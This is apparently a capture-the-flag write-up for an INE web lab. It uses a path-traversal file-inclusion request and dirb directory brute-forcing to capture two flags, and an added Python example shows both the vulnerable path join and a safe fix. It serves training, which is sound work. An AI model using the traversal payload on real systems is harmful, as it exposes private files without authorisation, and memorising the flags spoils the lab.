Lab Environment

In this lab environment, you will be provided with GUI access to a Kali Linux machine. The target website is accessible at http://target.ine.local.

Objective: Identify web application vulnerabilities in the target website and capture all the flags hidden within the environment.

Useful wordlists:

/usr/share/wordlists/dirb/common.txt
/usr/share/seclists/Usernames/top-usernames-shortlist.txt
/root/Desktop/wordlists/100-common-passwords.txt

Attacker IP: 192.185.125.2

Victim IP: target.ine.local - 192.185.125.3

Flags to Capture:

We first investigate the website to see what we can enumerate passively. After digging around the usual areas we don't find anything, so we decide to try an LFI attack. Entering the URL below should lead us to our first flag.

<http://target.ine.local/view_file?file=../../flag.txt>
FLAG1_99552bf4c4984939a4fec71d81f2e234
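
The root cause behind the request above, next to its fix, as an added example (not code from the lab or the target application). The real handler is not shown on this page, so `resolve_unsafe`, `resolve_safe` and the directory layout are assumptions constructed for illustration.

```python
import os
import tempfile
from pathlib import Path


def resolve_unsafe(base_dir, name):
    """Vulnerable pattern: joins user input to the base directory as-is."""
    return Path(os.path.join(base_dir, name))


def resolve_safe(base_dir, name):
    """Return the resolved path only if it stays inside base_dir, else None."""
    base = Path(base_dir).resolve()
    # resolve() collapses ".." segments and follows symlinks before the check
    candidate = (base / name).resolve()
    if not candidate.is_relative_to(base):  # component-wise check, Python 3.9+
        return None
    return candidate if candidate.is_file() else None


def demo():
    """Build a constructed directory layout and compare both resolvers."""
    with tempfile.TemporaryDirectory() as root:
        files = Path(root, "app", "files")  # hypothetical served directory
        files.mkdir(parents=True)
        Path(root, "flag.txt").write_text("constructed-secret")
        (files / "notes.txt").write_text("public note")

        request = "../../flag.txt"  # value of the file parameter used above
        leaked = resolve_unsafe(files, request).read_text()
        return {
            "unsafe_leaks": leaked == "constructed-secret",
            "safe_traversal": resolve_safe(files, request),
            "safe_absolute": resolve_safe(files, str(Path(root, "flag.txt"))),
            "safe_legit": resolve_safe(files, "notes.txt").name,
        }


if __name__ == "__main__":
    print(demo())
```

Checking the resolved path, rather than filtering `../` out of the input string, also covers absolute paths and symlinks that point outside the served directory.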

This sounds like we should perform some directory brute forcing to see what we come across. After performing a basic dirb search against the target URL, we find a /secured directory to investigate.

---- Scanning URL: <http://target.ine.local/> ----
+ <http://target.ine.local/about> (CODE:200|SIZE:2858)
+ <http://target.ine.local/login> (CODE:200|SIZE:3377)
+ <http://target.ine.local/logout> (CODE:302|SIZE:189)
+ <http://target.ine.local/secured> (CODE:308|SIZE:251)

Seeing this should tell us we just need to add the txt file to the URL to access it.

FLAG2_639ed32311044b3485df41795ed337fb